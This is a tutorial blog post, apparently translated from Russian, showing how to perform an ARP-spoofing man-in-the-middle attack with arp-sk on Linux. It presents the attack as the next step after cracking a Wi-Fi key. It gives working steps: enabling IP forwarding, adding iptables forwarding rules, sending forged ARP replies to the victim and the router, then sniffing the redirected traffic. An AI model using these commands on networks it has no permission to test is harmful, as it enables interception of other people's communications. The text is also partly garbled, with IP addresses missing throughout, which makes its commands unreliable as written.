Practice using arp-spoofing

    In this article I will tell you how to use the arp-sk utility package in the GNU / Linux operating system to implement a man-in-the-middle attack on the arp protocol.

    Why do we need such an attack:
    There are a lot of articles on the hub - for example, to crack Wi-Fi. But what to do after the key is cracked? Here you can see one of the options.

    Bit of theory

    The arp protocol is required for transmission in an Ethernet environment. Because the transfer is carried out by mac-addresses. Read more about the mac address on Wikipedia.
    In order for a message to be transferred from one network device to another, in particular from Victim to Router the computer needs to map IP address to mac address. Consider this process with the tcpdump utility
    # tcpdump -i eth1 -vvv
    21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has tell, length 28
    21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply is-at 00:50:ba:46:5d:92 (oui Unknown), length 46

    the first packet - the computer sends a broadcast message in order to find out the mac address that belongs to the IP address and a request to send a response to It is not visible here, but the computer, when sending this request, indicates its mac address as the source and the broadcast mac address (FF: FF: FF: FF: FF: FF) as the recipient address. Having received this packet, the network device should compare the ip-address with its own, and in case of coincidence, send the next packet.
    the second packet - the device with the address responds to the mac address that was specified in the request from its mac address, that the address is at 00: 50: ba: 46: 5d: 92.

    Due to the fact that the arp request is sent to the broadcast address, this message can be received by anyone who is in the same broadcast segment with the source. Therefore, one of the attack options arises - to constantly send a message about your mac address. At the same time, when the victim computer sends an arp request to the router, it immediately receives a response from the attacker. Accordingly, traffic will be sent to the attacker.

    Our task: to get the Victim computer traffic using the Attacker computer.
    For this we will use a spontaneous arp response. The arp protocol provides for the device to send an arp request or response if other devices do not require it. What is this for - for example, if the mac address of the router has changed. If the computer supports spontaneous arp, then it will rewrite the legitimate address to the address of the attacker.

    Conducting an attack

    Installing the necessary software

    Arp-sk: If the package is successfully compiled, install it. You can see the options for running the command using the following keys:
    # wget
    # tar xvzf arp-sk-0.0.16.tgz
    # cd arp-sk-0.0.16/
    # ./configure
    # make

    # make install

    # arp-sk --help

    Usage: arp-sk
    -r --reply отправлять ARP ответ

    -d --dst получатель в link layer ()
    -s --src источник в link layer ()

    -D --arp-dst получатель в ARP сообщении ([hostname|hostip][:MAC])
    -S --arp-src источник в ARP сообщении ([hostname|hostip][:MAC])

    -i --interface указать интерфейс (eth0)

    Address spoofing

    We must send to the router and the computer arp messages that the mac address of the other device is ours.
    before that, we will configure the Attacker computer to redirect traffic. To do this, enable traffic redirection in the kernel:
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    Now enable traffic redirection in the packet filter. I use iptables, so I am adding enabling policies to the FORWARD chain. Since my network is using a test network for attack, I can add the following rules: These 2 rules allow traffic redirection by the attacking computer for the address Attention! These rules are potentially dangerous, especially if you have several network interfaces. In this case, I recommend using more precise rules. Let's see the addresses Our address:
    # iptables -I FORWARD 1 -s -j ACCEPT
    # iptables -I FORWARD 2 -d -j ACCEPT

    # ifconfig eth1 | grep HW
    eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34

    Addresses of other devices Let's look at the routing table of the Victim computer: Now we send the following arp packets to the devices: we substitute our own as the mac address of another device. The first on behalf of that its mac address is now 00: 13: CE: 5C: 11: 34 we send to (00: 50: ba: 46: 5d: 92); the second on behalf of that his mac address is now 00: 13: CE: 5C: 11: 34 we are sending to (00: 1c: bf: 41: 53: 4b) We will have the following output: Now let's look at Victim arp -table: Actually everything. Now you can run your favorite sniffer and get the necessary packages. For example ping before Yandex . Addition. If a firewall is installed on the computer, it may display a message about spoofing.
    # arp -an
    ? ( at 00:50:ba:46:5d:92 [ether] on eth1
    ? ( at 00:1c:bf:41:53:4b [ether] on eth1


    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S -d 00:50:ba:46:5d:92 -D
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S -d 00:1c:bf:41:53:4b -D

    + Initialization of the packet structure
    + Running mode "reply"
    + Ifname: eth1
    + Source MAC: 00:13:ce:5c:11:34
    + Source ARP MAC: 00:13:ce:5c:11:34
    + Source ARP IP :
    + Target MAC: 00:1c:bf:41:53:4b
    + Target ARP MAC: 00:1c:bf:41:53:4b
    + Target ARP IP :

    --- Start classical sending ---
    TS: 21:30:44.338540
    To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
    ARP For (00:1c:bf:41:53:4b): is at 00:13:ce:5c:11:34



    This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation “Unlawful access to computer information”

    Also popular now: